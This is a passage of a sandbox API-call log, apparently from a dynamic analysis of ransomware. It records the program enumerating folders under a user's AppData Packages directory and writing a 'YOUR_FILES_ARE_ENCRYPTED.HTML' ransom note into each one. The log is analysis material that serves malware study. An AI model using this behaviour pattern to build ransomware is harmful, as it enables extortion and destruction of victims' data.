hTemplateFile=0x0) returned 0x214 [0116.783] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.784] CloseHandle (hObject=0x214) returned 1 [0116.784] GetProcessHeap () returned 0x600000 [0116.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.785] GetProcessHeap () returned 0x600000 [0116.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.785] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.785] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.785] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies") returned 110 [0116.785] GetProcessHeap () returned 0x600000 [0116.785] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.785] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies" [0116.785] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.785] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName="..", cAlternateFileName="")) returned 1 [0116.785] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName="..", cAlternateFileName="")) returned 0 [0116.785] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.785] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.786] GetProcessHeap () returned 0x600000 [0116.786] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.786] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.787] CloseHandle (hObject=0x214) returned 1 [0116.787] GetProcessHeap () returned 0x600000 [0116.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.787] GetProcessHeap () returned 0x600000 [0116.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.787] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.787] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.787] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory") returned 110 [0116.787] GetProcessHeap () returned 0x600000 [0116.787] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.787] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory" [0116.787] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0116.787] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName=".", cAlternateFileName="")) returned 0x626878 [0116.788] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName="..", cAlternateFileName="")) returned 1 [0116.788] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName="..", cAlternateFileName="")) returned 0 [0116.788] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0116.788] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.788] GetProcessHeap () returned 0x600000 [0116.788] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.788] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.789] CloseHandle (hObject=0x214) returned 1 [0116.789] GetProcessHeap () returned 0x600000 [0116.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.789] GetProcessHeap () returned 0x600000 [0116.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.789] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.789] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.789] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp") returned 103 [0116.789] GetProcessHeap () returned 0x600000 [0116.789] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.789] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp" [0116.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.789] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.790] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName="..", cAlternateFileName="")) returned 1 [0116.790] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName="..", cAlternateFileName="")) returned 0 [0116.790] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.790] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0116.790] GetProcessHeap () returned 0x600000 [0116.790] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.790] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.791] CloseHandle (hObject=0x214) returned 1 [0116.791] GetProcessHeap () returned 0x600000 [0116.791] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.791] GetProcessHeap () returned 0x600000 [0116.791] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.792] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.792] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.792] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0116.792] GetProcessHeap () returned 0x600000 [0116.792] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.793] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.794] CloseHandle (hObject=0x320) returned 1 [0116.794] GetProcessHeap () returned 0x600000 [0116.794] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.794] GetProcessHeap () returned 0x600000 [0116.794] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.795] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.795] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.795] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData") returned 103 [0116.795] GetProcessHeap () returned 0x600000 [0116.795] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.795] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData" [0116.795] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData\\*" [0116.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.796] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 1 [0116.796] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 0 [0116.796] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.796] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0116.796] GetProcessHeap () returned 0x600000 [0116.796] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.797] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.798] CloseHandle (hObject=0x320) returned 1 [0116.798] GetProcessHeap () returned 0x600000 [0116.798] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.798] GetProcessHeap () returned 0x600000 [0116.798] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.799] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59f918e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x59f918e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x59f918e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.799] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.799] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\LocalCache") returned 106 [0116.799] GetProcessHeap () returned 0x600000 [0116.799] 